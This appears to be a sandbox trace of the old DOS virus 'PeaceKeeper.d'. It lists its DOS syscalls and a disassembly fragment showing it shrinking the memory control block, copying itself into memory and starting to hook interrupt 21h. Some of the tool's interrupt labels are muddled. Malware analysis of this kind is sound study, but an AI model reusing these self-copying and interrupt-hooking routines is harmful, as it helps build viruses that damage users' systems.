Sample viewer

vx.netlux.org/Virus.DOS.PeaceKeeper.d

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:59:25.165701838Z 48 PC: 12bea | Get DOS version
2018-12-17T22:59:25.167589005Z 222 PC: 12bfd | UNKNOWN!
2018-12-17T22:59:25.168807736Z 53 PC: 12c2a | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T22:59:25.170110845Z 53 PC: 12c37 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:59:25.171705842Z 52 PC: 12b7f | Get InDOS flag pointer
2018-12-17T22:59:25.174489223Z 42 PC: 12c6c | Get date 0x12c6c: mov byte ptr [si + 0xa93], dh
0x12c70: mov bx, word ptr [si + 0xa43]
0x12c74: dec bx
0x12c75: mov es, bx
0x12c77: sub bx, bx
0x12c79: cmp byte ptr es:[bx], 0x5a
0x12c7d: je 0x12c82
0x12c7f: jmp 0x12b1d
0x12c82: mov ax, 0x184
0x12c85: sub word ptr es:[bx + 3], ax
0x12c89: sub word ptr es:[bx + 0x12], ax
0x12c8d: mov es, word ptr es:[bx + 0x12]
0x12c91: push si
0x12c92: sub cx, cx
0x12c94: sub di, di
0x12c96: or di, 0x100
0x12c9a: or cx, 0xf00
0x12c9e: rep movsb byte ptr es:[di], byte ptr [si]
0x12ca0: pop si
0x12ca1: mov ax, 0x2521